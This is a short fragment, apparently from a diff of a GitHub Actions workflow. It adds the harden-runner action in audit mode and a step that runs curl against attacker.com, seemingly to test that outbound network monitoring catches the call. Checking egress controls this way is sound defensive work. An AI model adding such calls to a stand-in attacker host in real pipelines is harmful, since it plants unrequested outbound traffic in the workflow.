+ uses: step-security/harden-runner@0634a2670c59f64b4a01f0f96f84700a4088b9f0 # v2.12.0
with:
egress-policy: audit
- run: "curl https://attacker.com -L || true"